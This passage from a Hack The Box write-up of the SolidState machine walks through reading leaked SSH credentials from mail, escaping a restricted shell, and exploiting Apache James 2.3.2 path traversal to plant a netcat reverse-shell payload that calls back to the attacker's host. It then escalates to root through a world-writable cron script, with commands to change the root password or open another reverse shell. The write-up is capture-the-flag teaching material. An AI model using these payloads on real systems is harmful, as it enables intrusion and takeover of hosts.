Connection closed by foreign host.
</code></pre></div>

<p>Aha, so this is the mailadmin writing john a message to send a password to Mindy.
If you check out Mindy&rsquo;s mails, you find it:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
</code></pre></div>

<p>The mail above is actually from mailadmin, not from john.
I suspect that was a little mistake.
Anyways, try to SSH into SolidState with <code>mindy</code> / <code>P@55W0rd1!2@</code> and you get in.
This is all you have to do to get the <code>user.txt</code> flag.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ ssh mindy@10.10.10.51
mindy@10.10.10.51&#39;s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt
4h56... &lt;- flag
</code></pre></div>

<p>Don&rsquo;t get too excited about the shell access though since all you get is a <a href="https://www.gnu.org/software/bash/manual/html_node/The-Restricted-Shell.html">restricted shell</a>.
Fortunately, it is easy though to circumvent it.
Apparently, you can just execute commands through SSH directly and they will not go through the restricted shell.
Execute bash this way and you get a real shell, albeit one without a real tty:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ ssh mindy@10.10.10.51 bash
mindy@10.10.10.51&#39;s password:
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
</code></pre></div>

<p>This was a little too easy.
It is a lot more fun to use the James exploit to bypass the restricted shell.
Let&rsquo;s do that next.</p>

<h2 id="exploiting-james">Exploiting James</h2>

<p>The exploit works by creating a user with name <code>../../../../../../../../etc/bash_completion.d</code> through the James admin interface.
James will then create a file for this user to store its mail.
The file&rsquo;s directory will be named after the user and due to improper escaping, it will be /etc/bash_completion.d.
Then you can send an email to that user.
It&rsquo;s text is put into a file inside that directory.
Consequently, the next time a user logs into the system, your email will be executed.</p>

<p>First, we log into the admin interface and create the user:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ nc <span style="color: #ae81ff">10</span>.10.10.51 <span style="color: #ae81ff">4555</span>
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
adduser ../../../../../../../../etc/bash_completion.d password
User ../../../../../../../../etc/bash_completion.d added
quit
Bye
</code></pre></div>

<p>Next, we send an email with a reverse shell payload.
Note the single quotes enclosing everything from the start of the MAIL FROM address to the beginning of the payload.
They make sure the rest of the mail does not interfere with the payload.
More details and examples how to use SMTP via telnet are in the <a href="https://mailtrap.io/blog/2016-07-26-how-to-test-smtp-server">Mailtrap blog</a> or <a href="https://utcc.utoronto.ca/usg/technotes/smtp-intro.html">here</a>.
Be sure to use EHLO, not HELO, to say hello.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ telnet <span style="color: #ae81ff">10</span>.10.10.51 <span style="color: #ae81ff">25</span>
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is &#39;^]&#39;.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 28 Jan 2018 17:42:35 -0500 (EST)
EHLO someone@mydomain
250-solidstate Hello someone@mydomain (10.10.15.130 [10.10.15.130])
250-PIPELINING
250 ENHANCEDSTATUSCODES
MAIL FROM: &lt;&#39;@mydomain&gt;
250 2.1.0 Sender &lt;&#39;@mydomain&gt; OK
RCPT TO: &lt;../../../../../../../../etc/bash_completion.d&gt;
250 2.1.5 Recipient &lt;../../../../../../../../etc/bash_completion.d@localhost&gt; OK
DATA
354 Ok Send data ending with &lt;CRLF&gt;.&lt;CRLF&gt;
FROM: someone@mydomain
&#39;
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.15.130 1234 &gt;/tmp/f
.
250 2.6.0 Message received
quit
221 2.0.0 solidstate Service closing transmission channel
Connection closed by foreign host.
</code></pre></div>

<p>Now run <code>nc -lnvp 1234</code> locally and then <code>ssh mindy@10.10.10.51</code> to trigger the payload.
You should catch the shell!
On the host, you can then inspect the file James created to understand how it worked.
You should also consider deleting it to cover your tracks and to not spoil the experience for others doing the box ;)</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>cat /etc/bash_completion.d/4D61696C313531373137393430333938342D30.Repository.FileStreamStore
Return-Path: &lt;&#39;@mydomain&gt;
Message-ID: &lt;570018.0.1517179404013.JavaMail.root@solidstate&gt;
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.15.130 ([10.10.15.130])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 597
          for &lt;../../../../../../../../etc/bash_completion.d@localhost&gt;;
          Sun, 28 Jan 2018 17:43:23 -0500 (EST)
Date: Sun, 28 Jan 2018 17:43:23 -0500 (EST)
FROM: someone@mydomain
&#39;
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.15.130 1234 &gt;/tmp/f
</code></pre></div>

<h1 id="privesc">Privesc</h1>

<p>The privesc is a pretty easy one.
Just look for files owned by root that we could write to.
To reduce false positives, only look for files (not symlinks) and exclude proc, which is full of root-owned writable files.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>find / -user root -perm -002 -type f -not -path &quot;/proc/*&quot;  2&gt;/dev/null
/opt/tmp.py
/sys/fs/cgroup/memory/cgroup.event_control
</code></pre></div>

<p>The file <code>/opt/tmp/py</code> looks interesting.
Have a look at it.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system(&#39;rm -r /tmp/* &#39;)
except:
     sys.exit()
</code></pre></div>

<p>A simple script that just deletes everything in the tmp directory.
If it is owned by root, maybe root is calling it sometimes.
Inspecting the cronjob configs in <code>/etc</code>, we can&rsquo;t find any evidence the script runs.
Nevertheless, it could also be configured in root&rsquo;s private cronfile <code>/var/spool/cron/crontabs/root</code>.
To find it out, do a simpe test by changing the command to <code>echo &quot;hi from root&quot; &gt; /dev/shm/.tmp.txt</code>.
If the .tmp.txt file appears, the script is run.</p>

<p>To be able to properly edit files on the host with vi, you first need a real shell though.
The method is described in detail <a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/">here</a>.
Here comes the short version:</p>

<ul>
<li>On the remote machine, run <code>python -c 'import pty; pty.spawn(&quot;bash&quot;)'</code> and press CTRL-z to put the SSH session to the background.</li>
<li>Then run <code>stty -a</code> to print out information about your shell. Note the rows and columns (say they are 40 and 160 respectively).</li>
<li>Now run <code>stty raw -echo</code> to put your shell into raw mode, then <code>fg</code> to get back into the SSH session, and finally reset to reset the shell. It you get asked for the type of the terminal, use <code>xterm-256color</code>.</li>
<li>After that, run <code>stty rows 40 columns 160</code> to specify the correct size. You should now have a fully working shell, in particular vi should work.</li>
</ul>

<p>With the new command put in place of the old one, we cannot observe <code>/dev/shm</code> to see if the file appears in it.
And indeed, after a few minutes, it will appear.
As you can see, it is owned by root, meaning that root ran the script.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>$<span style="color: #f92672">{</span>debian_chroot:+<span style="color: #f92672">(</span><span style="color: #f8f8f2">$debian_chroot</span><span style="color: #f92672">)}</span>mindy@solidstate:~$ ls -lah /dev/shm/
total 4.0K
drwxrwxrwt  2 root root   60 Jan 27 18:54 .
drwxr-xr-x 17 root root 3.0K Jan 27 17:19 ..
-rw-r--r--  1 root root   13 Jan 27 18:54 .tmp.txt
</code></pre></div>

<p>Since it all works as expected, we can easily get the flag now.
Change the script to execute to read the flag and put it into a new file.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>#!/usr/bin/env python
import os
import sys
try:
     os.system(&#39;cat /root/root.txt &gt; /dev/shm/flag.txt&#39;)
except:
     sys.exit()
</code></pre></div>

<p>To not just print the flag but get real access, you can use for example either of the following lines:
- <code>echo root:password | /usr/sbin/chpasswd &amp;&amp; echo &quot;done&quot; &gt; /dev/shm/done.txt</code>: changes root password to &lsquo;password&rsquo;. You can log in afterwards with <code>su</code> from your current SSH session.
- <code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.15.130 1234 &gt;/tmp/f</code>: get a new reverse shell. Catch with <code>nc -lnvp 1234</code> localcally.</p>

<p>Once root, you can see that it is indeed root&rsquo;s crontab that runs the script every three minutes:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@solidstate:/dev/shm# cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
[...]
# m h  dom mon dow   <span style="color: #f8f8f2">command</span>
*/3 * * * * python /opt/tmp.py
</code></pre></div>

<h1 id="links">Links</h1>

<p>Other write-uops for this box that I know of are the one by <a href="https://blog.mallardlabs.com/hackthebox-solidstate-writeup/">ELijah Seymour</a>, which contains a detailed walkthrough for the James exploit.
There is also one by <a href="https://ratil.life/hack-the-box-solidstate/">Trevor Steen</a> who puts the Python pty code directly into the James exploit. It is a nice idea since every SSH login should directly give you a real shell then.
Finally, check out the video walkthrough from <a href="https://www.youtube.com/watch?v=_QapCUx55Xk&amp;t">ippsec</a>, which is very nice to pick up the basic workflows.</p>

    </div>
    
    <footer>
      <hr>
      <p>
  Published
  
    
      by <span itemprop="author">Dominic Breuker</span>
    
  
  <time itemprop="datePublished" datetime="2018-01-30T00:00:00&#43;01:00">
    30 Jan, 2018
  </time>
  
    in <span itemprop="articleSection"><a href="/categories/hackthebox/">hackthebox</a></span>
  
  
    and tagged <a href="/tags/ctf/">ctf</a>, <a href="/tags/hackthebox/">hackthebox</a>, <a href="/tags/infosec/">infosec</a> and <a href="/tags/write-up/">write-up</a>
  
  using <span itemprop="wordCount">2504</span> words.
</p>

      


  <aside>
    <header>Related Content</header>
    <ul>
      
        <li><a href="/post/htb_calamity/">Hack The Box Write-up - Calamity</a>
        <time datetime="10M">10 minutes</time>
      
    </ul>
  </aside>


    </footer>
  </article>
</main>
    <footer>
  

</footer>
  </body>
</html>
